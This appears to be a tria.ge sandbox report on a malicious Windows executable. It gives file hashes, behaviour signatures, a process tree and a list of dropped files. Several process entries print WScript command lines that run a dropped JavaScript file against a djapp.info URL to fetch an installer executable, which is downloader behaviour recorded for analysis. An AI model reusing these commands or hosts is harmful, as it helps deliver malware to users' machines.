Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    15/06/2024, 02:17

General

  • Target

    a6b3e5fbf63dbd4b38610fd3ff8185d7.exe

  • Size

    184KB

  • MD5

    a6b3e5fbf63dbd4b38610fd3ff8185d7

  • SHA1

    a21fc2631a62895054ef80d98e748e41c5c30f0a

  • SHA256

    43c3b3e0e23d878f1223515a5a68a3c186e6a65ae3021e358865f3e0a9559544

  • SHA512

    d5e7f067945c905d43ba3268d2d9c0c634f49785943b90b47f0f34934aa3f0007f69e59bcf50cc67b012963db3a03c22d0dfe10d78d755040c5fd4a46708ddde

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3A:/7BSH8zUB+nGESaaRvoB7FJNndnB

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 14 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a6b3e5fbf63dbd4b38610fd3ff8185d7.exe
    "C:\Users\Admin\AppData\Local\Temp\a6b3e5fbf63dbd4b38610fd3ff8185d7.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:952
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf426.js" http://www.djapp.info/?domain=nyBphhwZbp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmG C:\Users\Admin\AppData\Local\Temp\fuf426.exe
      2⤵
      • Blocklisted process makes network request
      • Modifies system certificate store
      PID:2988
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf426.js" http://www.djapp.info/?domain=nyBphhwZbp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmG C:\Users\Admin\AppData\Local\Temp\fuf426.exe
      2⤵
      • Blocklisted process makes network request
      • Modifies system certificate store
      PID:2472
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf426.js" http://www.djapp.info/?domain=nyBphhwZbp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmG C:\Users\Admin\AppData\Local\Temp\fuf426.exe
      2⤵
      • Blocklisted process makes network request
      PID:2832
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf426.js" http://www.djapp.info/?domain=nyBphhwZbp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmG C:\Users\Admin\AppData\Local\Temp\fuf426.exe
      2⤵
      • Blocklisted process makes network request
      PID:1620
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf426.js" http://www.djapp.info/?domain=nyBphhwZbp.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmG C:\Users\Admin\AppData\Local\Temp\fuf426.exe
      2⤵
      • Blocklisted process makes network request
      PID:1976

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    1KB

    MD5

    376922dbddcc18c6d978ffcc4dfd9c83

    SHA1

    8b2a2b17cacc64e4f2ab74eb4336ff7165f0ae66

    SHA256

    852d434062781213577c596bb605cc41d386029076166976ea805f3c0fea8204

    SHA512

    e02c783c8b037ba8b40f17d39470e9a0b49ce50e57571beab75f0be8d43c188a4203f2e13948d7c20470b8459307e861d37f738427c89b5bce3fc0e26fb37a8b

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

    Filesize

    724B

    MD5

    8202a1cd02e7d69597995cabbe881a12

    SHA1

    8858d9d934b7aa9330ee73de6c476acf19929ff6

    SHA256

    58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

    SHA512

    97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

    Filesize

    1KB

    MD5

    a266bb7dcc38a562631361bbf61dd11b

    SHA1

    3b1efd3a66ea28b16697394703a72ca340a05bd5

    SHA256

    df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

    SHA512

    0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

    Filesize

    410B

    MD5

    ed3ea145b16be9647e4e72579d2d99c1

    SHA1

    b2c9697d81bc6460aab6735bf452251f3f96c74a

    SHA256

    b431f5fa2edabfc4a9cbe743a8ccb1c140b37d4ed94960982a51a5dedd1d46d6

    SHA512

    68b8471780de8421ab326c3bef1fc3dc35ef57a0ba7247d76796ce30864e2ffeedcc3116b8c80e853c1002cee5ff028277b7d36943df0407cde4b9a837323bbb

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    7fd0758ef32eb7ac1708cdc640ea7a2a

    SHA1

    3eafd767129b0851aa1f0f37646fe72f1db8a951

    SHA256

    04b28ba0945cef114f31c947477f79a41259f7e35debd46eacc010cfea72e874

    SHA512

    f4d7053c0b03598c42773268b1af2667d775edf09a1c81a8d0396ab7281d3c3031cb84a8d486de9cdb4386b5e42049604295da72f9b96ece58bcc9b25ec7a418

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

    Filesize

    392B

    MD5

    ab9064fd6f73506ee697b529f7482cc1

    SHA1

    e48315cbe66431351ad8d6d997ea6a7698a56fc7

    SHA256

    d1497dc06388ee873769bfa1d372ac7366b50d9e654c5ead945aa52b3dff0d09

    SHA512

    ecd053d4e6ce769725c0f9aa77316b5ea51d6193a6cc81b503771508661c0c3345ef0660fe7d6edb3bf28d158d60d3b132978b1e0b95fd39dd154ddf74208b41

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

    Filesize

    242B

    MD5

    72af4746759f2992d6a86a2618aee653

    SHA1

    a8c26da955a060eb691a48043a9bd55dcede2f26

    SHA256

    3f07bc0c9e2c6249044c549f11a07aec785dea9b6a5b2c5a04ddb9107af8a5b8

    SHA512

    b9e37fc8b2874d56d1a79fa5795ca419fe0260600b719f5c19a55cfbc53810ddf4fbfcd4297a8f5152b0b53d912837fdc8a9fa18f0c39d57f0185a8d86692e66

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0RVZHBJ6\domain_profile[1].htm

    Filesize

    40KB

    MD5

    96e81dd9544c4d10b9427de43cc13948

    SHA1

    ac0d14a0749692d5e029f5e23d9b1d11fe1e133f

    SHA256

    4d8344c801fd08b2f85184fe61327eb144f1faf8ca31a9e0e63d42b61aab0055

    SHA512

    6256f12cfa19ec04e97cc98403874822bece3f3eea2d359eee1a97b9e1b95e9401fc3840df765e4d9693fd9f160106e80c1ea93800d9257992eed866c0c2589a

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0RVZHBJ6\domain_profile[1].htm

    Filesize

    40KB

    MD5

    87cfcf5d4466d1fb8ee50ed3c3900dad

    SHA1

    9893c455aef78437e7aba2e75c92eb4452a33773

    SHA256

    7e4104bf4b2f484d3418258c5b0fee8716c996bba6a0a17b71e078de09233a49

    SHA512

    8e41953b3d60f9c4b455e6a769593534f8cbd382c93c820aaa03d361b655c4aad29032fcefd451eb2bbc4af76fa6ed7dc918c3ec35b57898d4a545d05c4ec091

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0RVZHBJ6\domain_profile[1].htm

    Filesize

    40KB

    MD5

    3a3f7e0bc97346c9dd52285cbba6d248

    SHA1

    a4c5690d5d96184f542f383985ecbcb4f8e9f65d

    SHA256

    e66cfd570cedbdc9707e18f7b85a5a4710cd39b3f0468692a66799600dcbdb7c

    SHA512

    4303647c4fe1aade71d92c802fbd7932ed46f571e1b9aab080499cf3b186c3c1ba208b477fb0861eed762a0e535e46cbd96c599f66660f0dcaf300992d7acb93

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H5JWXH9Z\domain_profile[1].htm

    Filesize

    40KB

    MD5

    4496a080e2bdd538a021337d2c2998cf

    SHA1

    3e785227cdbadd8a43eb966ad0259252f8ae28ec

    SHA256

    3dfd58c5775aeb86ed78d8f2e49038634d844d5a72b51c04d086043ec29da66e

    SHA512

    c279bbf8e0dff0bf255ac99b95a4790abbc8340d6ca0dd1f53a0cd3e3dfe7e8a913f38a13b17c7623dec411cbefc3180f529d43f7464ecbe94e117d9eff5d969

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H5JWXH9Z\domain_profile[1].htm

    Filesize

    40KB

    MD5

    2c7ffa25bf7c6a73f2e3f6c02683885e

    SHA1

    aa34f951156a5e751ccfce23ed8088fbb386afbc

    SHA256

    839e664a92f014e59db72819657a80eb13df1a18f004b0adcc1f4edcfda756d2

    SHA512

    0806ce109d05caaa27aeb24a4c691efe399a106a121bfe8c1f36c65f3f13bc465b7b26961b150597c1139d343eb96796fd037a765f88389348b1e6955eb1b560

  • C:\Users\Admin\AppData\Local\Temp\Tar339F.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Local\Temp\fuf426.js

    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\ETV2B04H.txt

    Filesize

    175B

    MD5

    7625e53be6eadaddd2f266cf43b6d38f

    SHA1

    9093c07271455a63ae0ecb5ead73435da82d1974

    SHA256

    9b985d3f66c88ae865c36c26e35f2f7d0a4efe441943d8d4ba79e558bc81995d

    SHA512

    a90b9333a58fa640e08f5006bed28e9eaadc575a4af4a3c348f27de6caf48a3cb0fe6f6995ef219a909111da06cfb68c246833dfe91eefeed6bbf9432f00f206